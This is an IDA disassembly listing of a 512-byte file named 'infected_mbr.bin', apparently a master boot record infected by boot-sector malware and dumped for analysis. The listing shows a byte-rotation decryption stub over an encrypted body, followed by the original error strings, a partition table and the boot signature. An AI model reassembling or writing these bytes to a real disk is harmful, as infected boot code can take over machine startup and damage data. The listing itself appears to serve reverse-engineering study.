seg000:0000 ;
seg000:0000 ; +-------------------------------------------------------------------------+
seg000:0000 ; ¦     This file is generated by The Interactive Disassembler (IDA)        ¦
seg000:0000 ; ¦     Copyright (c) 2010 by Hex-Rays SA, <support@hex-rays.com>           ¦
seg000:0000 ; ¦                      Licensed to: Freeware version                      ¦
seg000:0000 ; +-------------------------------------------------------------------------+
seg000:0000 ;
seg000:0000 ; Input MD5   : 5E171882A6C36AFF4F9B677AA652B5BD
seg000:0000
seg000:0000 ; ---------------------------------------------------------------------------
seg000:0000 ; File Name   : C:\Users\Fabricio\Downloads\infected_mbr.bin
seg000:0000 ; Format      : Binary file
seg000:0000 ; Base Address: 0000h Range: 0000h - 0200h Loaded length: 0200h
seg000:0000
seg000:0000                 .686p
seg000:0000                 .mmx
seg000:0000                 .model flat
seg000:0000
seg000:0000 ; ---------------------------------------------------------------------------
seg000:0000
seg000:0000 ; Segment type: Regular
seg000:0000 seg000          segment byte public '' use16
seg000:0000                 assume cs:seg000
seg000:0000                 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:0000                 xor     ax, ax
seg000:0002                 mov     ss, ax
seg000:0004                 mov     sp, 7C00h
seg000:0007                 mov     es, ax
seg000:0009                 mov     ds, ax
seg000:000B                 sti
seg000:000C                 pusha
seg000:000D                 mov     cx, 0CFh ; '¤'
seg000:0010                 mov     bp, 7C19h
seg000:0013
seg000:0013 loc_13:                                 ; CODE XREF: seg000:0017j
seg000:0013                 ror     byte ptr [bp+0], cl
seg000:0016                 inc     bp
seg000:0017                 loop    loc_13
seg000:0019                 inc     sp
seg000:001A                 test    [di], bx
seg000:001C                 mov     word ptr [si], 26B8h
seg000:0020                 add     al, 8
seg000:0022                 push    4062h
seg000:0025                 push    cs
seg000:0026                 or      word ptr [si], 0FFA3h
seg000:0029                 mov     cl, 1Fh
seg000:002B                 xchg    ax, si
seg000:002C                 test    dh, ch
seg000:002E                 out     0F8h, ax        ; AT 80287 data.
seg000:002E                                         ; 286 sends opcodes & operands and receives results.
seg000:0030                 mov     word ptr [bp+di], 8F7Eh
seg000:0034                 loope   $+2
seg000:0036                 aaa
seg000:0037                 db      26h
seg000:0037                 mov     di, 1FF1h
seg000:003B                 aaa
seg000:003C                 push    ax
seg000:003D                 add     [bp+di+0D0h], ah
seg000:0041                 xor     sp, dx
seg000:0043                 mov     [bx+di], al
seg000:0043 ; ---------------------------------------------------------------------------
seg000:0045                 db 0FFh
seg000:0046                 db 0D8h ; Ï
seg000:0047                 db 0C6h ; ã
seg000:0048                 db  7Ch ; |
seg000:0049                 db  83h ; â
seg000:004A                 db  4Ch ; L
seg000:004B                 db 0FFh
seg000:004C                 db  8Eh ; Ä
seg000:004D                 db 0B0h ; ¦
seg000:004E                 db    0
seg000:004F                 db  7Dh ; }
seg000:0050                 db  1Dh
seg000:0051                 db 0BEh ; ¥
seg000:0052                 db 0E2h ; Ô
seg000:0053                 db 0C1h ; -
seg000:0054                 db 0B1h ; ¦
seg000:0055                 db 0EBh ; Ù
seg000:0056                 db 0CFh ; ¤
seg000:0057                 db  49h ; I
seg000:0058                 db 0A1h ; í
seg000:0059                 db  8Ch ; î
seg000:005A                 db  5Fh ; _
seg000:005B                 db 0B0h ; ¦
seg000:005C                 db  0Ch
seg000:005D                 db 0ABh ; ½
seg000:005E                 db 0B7h ; À
seg000:005F                 db 0C2h ; -
seg000:0060                 db 0EAh ; Û
seg000:0061                 db    0
seg000:0062                 db    0
seg000:0063                 db    0
seg000:0064                 db    0
seg000:0065                 db    3
seg000:0066                 db  1Bh
seg000:0067                 db  0Ch
seg000:0068                 db 0E9h ; Ú
seg000:0069                 db  3Eh ; >
seg000:006A                 db    4
seg000:006B                 db 0D8h ; Ï
seg000:006C                 db  60h ; `
seg000:006D                 db  5Fh ; _
seg000:006E                 db 0F1h ; ±
seg000:006F                 db    2
seg000:0070                 db  0Eh
seg000:0071                 db 0C7h ; Ã
seg000:0072                 db  81h ; ü
seg000:0073                 db 0FDh ; ²
seg000:0074                 db 0C7h ; Ã
seg000:0075                 db  3Eh ; >
seg000:0076                 db  18h
seg000:0077                 db 0DBh ; ¦
seg000:0078                 db  7Ch ; |
seg000:0079                 db  8Bh ; ï
seg000:007A                 db  5Fh ; _
seg000:007B                 db 0CCh ; ¦
seg000:007C                 db 0FFh
seg000:007D                 db 0B1h ; ¦
seg000:007E                 db  24h ; $
seg000:007F                 db 0FAh ; ·
seg000:0080                 db  66h ; f
seg000:0081                 db 0C7h ; Ã
seg000:0082                 db  81h ; ü
seg000:0083                 db  3Eh ; >
seg000:0084                 db 0C7h ; Ã
seg000:0085                 db  33h ; 3
seg000:0086                 db 0FFh
seg000:0087                 db  6Ch ; l
seg000:0088                 db  0Dh
seg000:0089                 db 0BEh ; ¥
seg000:008A                 db  99h ; Ö
seg000:008B                 db 0F1h ; ±
seg000:008C                 db  60h ; `
seg000:008D                 db 0AFh ; »
seg000:008E                 db 0F1h ; ±
seg000:008F                 db 0CCh ; ¦
seg000:0090                 db  40h ; @
seg000:0091                 db  33h ; 3
seg000:0092                 db  4Ah ; J
seg000:0093                 db 0C0h ; +
seg000:0094                 db  1Fh
seg000:0095                 db 0E3h ; Ò
seg000:0096                 db  99h ; Ö
seg000:0097                 db    7
seg000:0098                 db  1Eh
seg000:0099                 db 0FAh ; ·
seg000:009A                 db  1Fh
seg000:009B                 db    0
seg000:009C                 db  4Bh ; K
seg000:009D                 db  12h
seg000:009E                 db 0FAh ; ·
seg000:009F                 db 0D3h ; Ë
seg000:00A0                 db  7Ch ; |
seg000:00A1                 db  45h ; E
seg000:00A2                 db  85h ; à
seg000:00A3                 db  1Dh
seg000:00A4                 db 0C7h ; Ã
seg000:00A5                 db  6Eh ; n
seg000:00A6                 db  4Ch ; L
seg000:00A7                 db 0C2h ; -
seg000:00A8                 db 0C3h ; +
seg000:00A9                 db  33h ; 3
seg000:00AA                 db  4Ch ; L
seg000:00AB                 db  18h
seg000:00AC                 db  8Eh ; Ä
seg000:00AD                 db 0B5h ; Á
seg000:00AE                 db 0FFh
seg000:00AF                 db    3
seg000:00B0                 db  3Eh ; >
seg000:00B1                 db  8Bh ; ï
seg000:00B2                 db  5Fh ; _
seg000:00B3                 db  6Ah ; j
seg000:00B4                 db  44h ; D
seg000:00B5                 db 0A3h ; ú
seg000:00B6                 db  34h ; 4
seg000:00B7                 db 0CCh ; ¦
seg000:00B8                 db 0FFh
seg000:00B9                 db    7
seg000:00BA                 db  42h ; B
seg000:00BB                 db 0AFh ; »
seg000:00BC                 db  66h ; f
seg000:00BD                 db  1Ch
seg000:00BE                 db  78h ; x
seg000:00BF                 db  1Ah
seg000:00C0                 db  7Dh ; }
seg000:00C1                 db    0
seg000:00C2                 db 0FAh ; ·
seg000:00C3                 db 0BCh ; +
seg000:00C4                 db  98h ; ÿ
seg000:00C5                 db  6Eh ; n
seg000:00C6                 db 0EEh ; ¯
seg000:00C7                 db  20h
seg000:00C8                 db    0
seg000:00C9                 db  5Fh ; _
seg000:00CA                 db  47h ; G
seg000:00CB                 db 0AFh ; »
seg000:00CC                 db  3Fh ; ?
seg000:00CD                 db  35h ; 5
seg000:00CE                 db 0A4h ; ñ
seg000:00CF                 db 0DDh ; ¦
seg000:00D0                 db  85h ; à
seg000:00D1                 db 0E4h ; õ
seg000:00D2                 db  1Dh
seg000:00D3                 db 0C1h ; -
seg000:00D4                 db  10h
seg000:00D5                 db  76h ; v
seg000:00D6                 db  0Eh
seg000:00D7                 db  8Dh ; ì
seg000:00D8                 db  10h
seg000:00D9                 db  94h ; ö
seg000:00DA                 db  7Ah ; z
seg000:00DB                 db  20h
seg000:00DC                 db 0FCh ; ³
seg000:00DD                 db  4Ch ; L
seg000:00DE                 db 0A7h ; º
seg000:00DF                 db  96h ; û
seg000:00E0                 db  75h ; u
seg000:00E1                 db  75h ; u
seg000:00E2                 db 0F0h ; ­
seg000:00E3                 db  0Eh
seg000:00E4                 db  86h ; å
seg000:00E5                 db  63h ; c
seg000:00E6                 db  91h ; æ
seg000:00E7                 db    0
seg000:00E8                 db    0
seg000:00E9                 db  60h ; `
seg000:00EA                 db 0BBh ; +
seg000:00EB                 db 0AAh ; ¬
seg000:00EC                 db  55h ; U
seg000:00ED                 db 0B4h ; ¦
seg000:00EE                 db  41h ; A
seg000:00EF                 db 0CDh ; -
seg000:00F0                 db  13h
seg000:00F1                 db  72h ; r
seg000:00F2                 db  36h ; 6
seg000:00F3                 db  81h ; ü
seg000:00F4                 db 0FBh ; ¹
seg000:00F5                 db  55h ; U
seg000:00F6                 db 0AAh ; ¬
seg000:00F7                 db  75h ; u
seg000:00F8                 db  30h ; 0
seg000:00F9                 db 0F6h ; ÷
seg000:00FA                 db 0C1h ; -
seg000:00FB                 db    1
seg000:00FC                 db  74h ; t
seg000:00FD                 db  2Bh ; +
seg000:00FE                 db  61h ; a
seg000:00FF                 db  60h ; `
seg000:0100                 db  6Ah ; j
seg000:0101                 db    0
seg000:0102                 db  6Ah ; j
seg000:0103                 db    0
seg000:0104                 db 0FFh
seg000:0105                 db  76h ; v
seg000:0106                 db  0Ah
seg000:0107                 db 0FFh
seg000:0108                 db  76h ; v
seg000:0109                 db    8
seg000:010A                 db  6Ah ; j
seg000:010B                 db    0
seg000:010C                 db  68h ; h
seg000:010D                 db    0
seg000:010E                 db  7Ch ; |
seg000:010F                 db  6Ah ; j
seg000:0110                 db    1
seg000:0111                 db  6Ah ; j
seg000:0112                 db  10h
seg000:0113                 db 0B4h ; ¦
seg000:0114                 db  42h ; B
seg000:0115                 db  8Bh ; ï
seg000:0116                 db 0F4h ; ¶
seg000:0117                 db 0CDh ; -
seg000:0118                 db  13h
seg000:0119                 db  61h ; a
seg000:011A                 db  61h ; a
seg000:011B                 db  73h ; s
seg000:011C                 db  0Eh
seg000:011D                 db  4Fh ; O
seg000:011E                 db  74h ; t
seg000:011F                 db  0Bh
seg000:0120                 db  32h ; 2
seg000:0121                 db 0E4h ; õ
seg000:0122                 db  8Ah ; è
seg000:0123                 db  56h ; V
seg000:0124                 db    0
seg000:0125                 db 0CDh ; -
seg000:0126                 db  13h
seg000:0127                 db 0EBh ; Ù
seg000:0128                 db 0D6h ; Í
seg000:0129                 db  61h ; a
seg000:012A                 db 0F9h ; ¨
seg000:012B                 db 0C3h ; +
seg000:012C                 db  49h ; I
seg000:012D                 db  6Eh ; n
seg000:012E                 db  76h ; v
seg000:012F                 db  61h ; a
seg000:0130                 db  6Ch ; l
seg000:0131                 db  69h ; i
seg000:0132                 db  64h ; d
seg000:0133                 db  20h
seg000:0134                 db  70h ; p
seg000:0135                 db  61h ; a
seg000:0136                 db  72h ; r
seg000:0137                 db  74h ; t
seg000:0138                 db  69h ; i
seg000:0139                 db  74h ; t
seg000:013A                 db  69h ; i
seg000:013B                 db  6Fh ; o
seg000:013C                 db  6Eh ; n
seg000:013D                 db  20h
seg000:013E                 db  74h ; t
seg000:013F                 db  61h ; a
seg000:0140                 db  62h ; b
seg000:0141                 db  6Ch ; l
seg000:0142                 db  65h ; e
seg000:0143                 db    0
seg000:0144                 db  45h ; E
seg000:0145                 db  72h ; r
seg000:0146                 db  72h ; r
seg000:0147                 db  6Fh ; o
seg000:0148                 db  72h ; r
seg000:0149                 db  20h
seg000:014A                 db  6Ch ; l
seg000:014B                 db  6Fh ; o
seg000:014C                 db  61h ; a
seg000:014D                 db  64h ; d
seg000:014E                 db  69h ; i
seg000:014F                 db  6Eh ; n
seg000:0150                 db  67h ; g
seg000:0151                 db  20h
seg000:0152                 db  6Fh ; o
seg000:0153                 db  70h ; p
seg000:0154                 db  65h ; e
seg000:0155                 db  72h ; r
seg000:0156                 db  61h ; a
seg000:0157                 db  74h ; t
seg000:0158                 db  69h ; i
seg000:0159                 db  6Eh ; n
seg000:015A                 db  67h ; g
seg000:015B                 db  20h
seg000:015C                 db  73h ; s
seg000:015D                 db  79h ; y
seg000:015E                 db  73h ; s
seg000:015F                 db  74h ; t
seg000:0160                 db  65h ; e
seg000:0161                 db  6Dh ; m
seg000:0162                 db    0
seg000:0163                 db  4Dh ; M
seg000:0164                 db  69h ; i
seg000:0165                 db  73h ; s
seg000:0166                 db  73h ; s
seg000:0167                 db  69h ; i
seg000:0168                 db  6Eh ; n
seg000:0169                 db  67h ; g
seg000:016A                 db  20h
seg000:016B                 db  6Fh ; o
seg000:016C                 db  70h ; p
seg000:016D                 db  65h ; e
seg000:016E                 db  72h ; r
seg000:016F                 db  61h ; a
seg000:0170                 db  74h ; t
seg000:0171                 db  69h ; i
seg000:0172                 db  6Eh ; n
seg000:0173                 db  67h ; g
seg000:0174                 db  20h
seg000:0175                 db  73h ; s
seg000:0176                 db  79h ; y
seg000:0177                 db  73h ; s
seg000:0178                 db  74h ; t
seg000:0179                 db  65h ; e
seg000:017A                 db  6Dh ; m
seg000:017B                 db    0
seg000:017C                 db    0
seg000:017D                 db    0
seg000:017E                 db    0
seg000:017F                 db    0
seg000:0180                 db    0
seg000:0181                 db    0
seg000:0182                 db    0
seg000:0183                 db    0
seg000:0184                 db    0
seg000:0185                 db    0
seg000:0186                 db    0
seg000:0187                 db    0
seg000:0188                 db    0
seg000:0189                 db    0
seg000:018A                 db    0
seg000:018B                 db    0
seg000:018C                 db    0
seg000:018D                 db    0
seg000:018E                 db    0
seg000:018F                 db    0
seg000:0190                 db    0
seg000:0191                 db    0
seg000:0192                 db    0
seg000:0193                 db    0
seg000:0194                 db    0
seg000:0195                 db    0
seg000:0196                 db    0
seg000:0197                 db    0
seg000:0198                 db    0
seg000:0199                 db    0
seg000:019A                 db    0
seg000:019B                 db    0
seg000:019C                 db    0
seg000:019D                 db    0
seg000:019E                 db    0
seg000:019F                 db    0
seg000:01A0                 db    0
seg000:01A1                 db    0
seg000:01A2                 db    0
seg000:01A3                 db    0
seg000:01A4                 db    0
seg000:01A5                 db    0
seg000:01A6                 db    0
seg000:01A7                 db    0
seg000:01A8                 db    0
seg000:01A9                 db    0
seg000:01AA                 db    0
seg000:01AB                 db    0
seg000:01AC                 db    0
seg000:01AD                 db    0
seg000:01AE                 db    0
seg000:01AF                 db    0
seg000:01B0                 db    0
seg000:01B1                 db    0
seg000:01B2                 db    0
seg000:01B3                 db    0
seg000:01B4                 db    0
seg000:01B5                 db  2Ch ; ,
seg000:01B6                 db  44h ; D
seg000:01B7                 db  63h ; c
seg000:01B8                 db  7Dh ; }
seg000:01B9                 db 0BAh ; ¦
seg000:01BA                 db  7Dh ; }
seg000:01BB                 db 0BAh ; ¦
seg000:01BC                 db    0
seg000:01BD                 db    0
seg000:01BE                 db  80h ; Ç
seg000:01BF                 db    1
seg000:01C0                 db    1
seg000:01C1                 db    0
seg000:01C2                 db    7
seg000:01C3                 db 0FEh ; ¦
seg000:01C4                 db 0F8h ; °
seg000:01C5                 db 0FFh
seg000:01C6                 db  38h ; 8
seg000:01C7                 db    0
seg000:01C8                 db    0
seg000:01C9                 db    0
seg000:01CA                 db  88h ; ê
seg000:01CB                 db 0BDh ; ¢
seg000:01CC                 db  7Fh ; 
seg000:01CD                 db    2
seg000:01CE                 db    0
seg000:01CF                 db    0
seg000:01D0                 db    0
seg000:01D1                 db    0
seg000:01D2                 db    0
seg000:01D3                 db    0
seg000:01D4                 db    0
seg000:01D5                 db    0
seg000:01D6                 db    0
seg000:01D7                 db    0
seg000:01D8                 db    0
seg000:01D9                 db    0
seg000:01DA                 db    0
seg000:01DB                 db    0
seg000:01DC                 db    0
seg000:01DD                 db    0
seg000:01DE                 db    0
seg000:01DF                 db    0
seg000:01E0                 db    0
seg000:01E1                 db    0
seg000:01E2                 db    0
seg000:01E3                 db    0
seg000:01E4                 db    0
seg000:01E5                 db    0
seg000:01E6                 db    0
seg000:01E7                 db    0
seg000:01E8                 db    0
seg000:01E9                 db    0
seg000:01EA                 db    0
seg000:01EB                 db    0
seg000:01EC                 db    0
seg000:01ED                 db    0
seg000:01EE                 db    0
seg000:01EF                 db    0
seg000:01F0                 db    0
seg000:01F1                 db    0
seg000:01F2                 db    0
seg000:01F3                 db    0
seg000:01F4                 db    0
seg000:01F5                 db    0
seg000:01F6                 db    0
seg000:01F7                 db    0
seg000:01F8                 db    0
seg000:01F9                 db    0
seg000:01FA                 db    0
seg000:01FB                 db    0
seg000:01FC                 db    0
seg000:01FD                 db    0
seg000:01FE                 db  55h ; U
seg000:01FF                 db 0AAh ; ¬
seg000:01FF seg000          ends
seg000:01FF
seg000:01FF
seg000:01FF                 end
